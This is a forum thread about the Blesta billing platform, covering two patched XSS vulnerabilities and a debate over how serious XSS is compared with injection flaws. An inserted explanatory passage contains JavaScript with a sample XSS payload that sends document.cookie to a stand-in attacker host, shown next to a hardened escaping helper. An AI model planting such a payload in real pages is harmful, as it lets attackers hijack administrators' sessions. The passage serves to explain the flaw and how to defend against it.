Page 2 of 2
Results 26 to 37 of 37

Thread: How is Blesta?

  1. #26
    Join Date
    Mar 2009
    Location
    Turkey
    Posts
    45
    Usa And Turkey based Shared, Reseller Hosting, VPS www.karincahosting.com

  2. #27
    Join Date
    Jul 2005
    Posts
    3,784
    Funny, when there's a WHMCS security issue, people go crazy. When there's a Blesta security issue, you hardly hear about it.

    ** Security Update Issued
    ------------------------------------------------------------
    An update for Blesta was just released to address two security vulnerabilities and it is recommended that you update as soon as possible.

    * [CORE-931] - Security: XSS vulnerability in client payment process
    * [CORE-932] - Security: Potential XSS vulnerabilities in use of Html::concat()
    Last edited by Tyl3r; 12-20-2013 at 06:56 PM.

  3. #28
    Join Date
    Dec 2010
    Location
    127.0.0.1
    Posts
    5,732
    Quote Originally Posted by stablehost View Post
    Funny, when there's a WHMCS security issue, people go crazy. When there's a Blesta security issue, you hardly hear about it.

    Doesn't even look like it's in their CHANGELOG. This is what we received from Rack911

    --

    ** Security Update Issued
    ------------------------------------------------------------
    An update for Blesta was just released to address two security vulnerabilities and it is recommended that you update as soon as possible.

    http://hostingseclist.us3.list-manag...6&e=8984051e46
    * [CORE-931] - Security: XSS vulnerability in client payment process
    * [CORE-932] - Security: Potential XSS vulnerabilities in use of Html::concat()
    Probably because of:

    1. They aren't as bad as WHMCS's vulnerabilities which could result in your system being accessed.

2. It's not been made public, as it was found by a security expert or the Blesta team themselves.

  4. #29
    Join Date
    Jul 2005
    Posts
    3,784
    Quote Originally Posted by CW Mike View Post
    Probably because of:

    1. They aren't as bad as WHMCS's vulnerabilities which could result in your system being accessed.
    You don't think XSS issues are serious?

  5. #30
    Join Date
    Jul 2010
    Location
    Bogotá, Colombia.
    Posts
    368
    Quote Originally Posted by stablehost View Post
    Funny, when there's a WHMCS security issue, people go crazy. When there's a Blesta security issue, you hardly hear about it.

    ** Security Update Issued
    ------------------------------------------------------------
    An update for Blesta was just released to address two security vulnerabilities and it is recommended that you update as soon as possible.

    * [CORE-931] - Security: XSS vulnerability in client payment process
    * [CORE-932] - Security: Potential XSS vulnerabilities in use of Html::concat()
    Maybe those issues were found internally and not made public prior to the patch...

  6. #31
    Join Date
    May 2003
    Location
    California, USA, Earth
    Posts
    1,098
    Quote Originally Posted by stablehost View Post
    Funny, when there's a WHMCS security issue, people go crazy. When there's a Blesta security issue, you hardly hear about it.

    ** Security Update Issued
    ------------------------------------------------------------
    An update for Blesta was just released to address two security vulnerabilities and it is recommended that you update as soon as possible.

    * [CORE-931] - Security: XSS vulnerability in client payment process
    * [CORE-932] - Security: Potential XSS vulnerabilities in use of Html::concat()
    The issue reported to us didn't appear to be actually exploitable. The other 2 we found. Nothing in the wild. It would be so easy to silently patch things, but we don't sweep anything under the rug.

    Rack911 got on that quick. Awesome. Everyone should subscribe to their lists.
    Blesta - The Billing Platform for Hosting Providers
    Client Management, Billing, & Support Software
    Trial - Demo | 714-923-7325 | Twitter @blesta

  7. #32
    Join Date
    Dec 2010
    Location
    127.0.0.1
    Posts
    5,732
    Quote Originally Posted by stablehost View Post
    You don't think XSS issues are serious?
Would you rather have an XSS issue which can't damage anything serious, or would you rather have an issue which allows someone to gain access to your administration area, download backups, download client information, even delete everything via MySQL injection or by changing files through a link?

    Also the XSS couldn't allow anyone to gain admin access. So yes I don't think it is serious.

  8. #33
    Join Date
    Oct 2002
    Location
    /roof/ledge
    Posts
    28,088
    Quote Originally Posted by CW Mike View Post
    Would you rather have a XSS issue which can't damage anything serious
    You may wish to read up on XSS.
    Your one stop shop for decentralization

  9. #34
    Join Date
    Dec 2010
    Location
    127.0.0.1
    Posts
    5,732
    Quote Originally Posted by bear View Post
    You may wish to read up on XSS.
I know they are both as bad, security-wise (like a billing system that allowed admin access via an XSS); however, these aren't high risk like many other systems.

    https://www.owasp.org/index.php/Top_10_2010-Main

The Open Web Application Security Project believes injection is the top risk (so I believe injection is a higher risk than a small, harmless(ish) XSS, and it isn't as bad as a MySQL injection)... which other systems have had exploits for, which are in the wild.

  10. #35
    Join Date
    Oct 2002
    Location
    /roof/ledge
    Posts
    28,088
    If someone hijacked an admin session (for instance), they have access to it all; logins, admin users, servers and so on. Someone using an injection to reveal admin users/emails/passwords (as in the October WHMCS issue) does less in that incarnation. It's foolish to downplay any such security issues as not being as bad, when they are, just in different ways.

    What matters is if they're fixed, how quickly, and how well.
    Both Blesta and Hostbill seem to be dealing with these strikingly fast, and I'm not seeing complaints about things breaking. Good job, them.
    Your one stop shop for decentralization
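The two posts above (the Rack911 notice about XSS in the use of Html::concat(), and bear's point that a hijacked admin session gives an attacker everything) are easier to see with code. The following is an added example, not Blesta's code and not Rack911's: it models a hypothetical string-joining HTML helper that renders a client-supplied field verbatim, beside a hardened version that escapes each interpolated value. The payment-row renderer, the `attacker.example` host, and the client name payload are all constructed for illustration.

```javascript
// Added example: a hypothetical concat-style HTML helper, vulnerable and hardened.
// Nothing here is Blesta's own code; names and the sample input are constructed.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can break out of text or quoted-attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Vulnerable: joins fragments verbatim, so any markup inside a user field
// becomes real markup in the page (reflected/stored XSS).
function unsafeConcat(...parts) {
  return parts.join('');
}

// Hardened: used as a tagged template, the literal parts are trusted and every
// interpolated value is escaped before it is joined in.
function safeConcat(strings, ...values) {
  return strings.reduce(
    (out, literal, i) => out + literal + (i < values.length ? escapeHtml(values[i]) : ''),
    ''
  );
}

// Constructed sample input: a client "name" attached to a payment record.
// If rendered unescaped in a page an administrator views, it ships the admin's
// cookies to a third party, which is the session hijack bear describes.
const PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

function renderPaymentRowUnsafe(clientName, amount) {
  return unsafeConcat('<tr><td>', clientName, '</td><td>', amount, '</td></tr>');
}

function renderPaymentRowSafe(clientName, amount) {
  return safeConcat`<tr><td>${clientName}</td><td>${amount}</td></tr>`;
}

// Simple check a reviewer might run over rendered output: does a script tag survive?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demo.
console.log('unsafe :', renderPaymentRowUnsafe(PAYLOAD, '10.00'));
console.log('safe   :', renderPaymentRowSafe(PAYLOAD, '10.00'));
```

The hardened helper only fixes the text and quoted-attribute contexts; a value dropped into a URL, an inline event handler, or a `<script>` block needs context-specific encoding, and an `HttpOnly` session cookie blunts the cookie theft shown in the payload but not other actions an injected script can take with the victim's session.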

  11. #36
    Join Date
    Mar 2013
    Posts
    918
    Quote Originally Posted by bear View Post
    If someone hijacked an admin session (for instance), they have access to it all; logins, admin users, servers and so on. Someone using an injection to reveal admin users/emails/passwords (as in the October WHMCS issue) does less in that incarnation. It's foolish to downplay any such security issues as not being as bad, when they are, just in different ways.

    What matters is if they're fixed, how quickly, and how well.
    Both Blesta and Hostbill seem to be dealing with these strikingly fast, and I'm not seeing complaints about things breaking. Good job, them.
What bear said is how I feel. If a company is reporting what they are fixing internally, it should not be held against them when it is done in the way Hostbill and Blesta have been working on it. I recall a prior thread where it was stated that all software has vulnerabilities, and I agree with that statement. The trick is actually when you have a software company that works hard to find and fix the exploits before the exploit is used or becomes public.

  12. #37
Quote Originally Posted by CW Mike View Post
I'm not, and have not had any customer complain; however, I can't answer for others. There was a thread about it in the support forums.

You can edit them via the routes file, which Tyson mentioned in the thread in the support forums.
Got a link for that? My Google-fu is not showing me results relevant to that.

Er... never mind. Searching directly in the forums revealed the answer.

It's here for anyone else wondering: http://www.blesta.com/forums/index.p...-shorter-urls/
    ★ Nicholas @ EidolonHost
    ★ Blesta and InterWorx Reseller. See WebHost Licenses for details.
    ★ We have Let's Encrypt Support
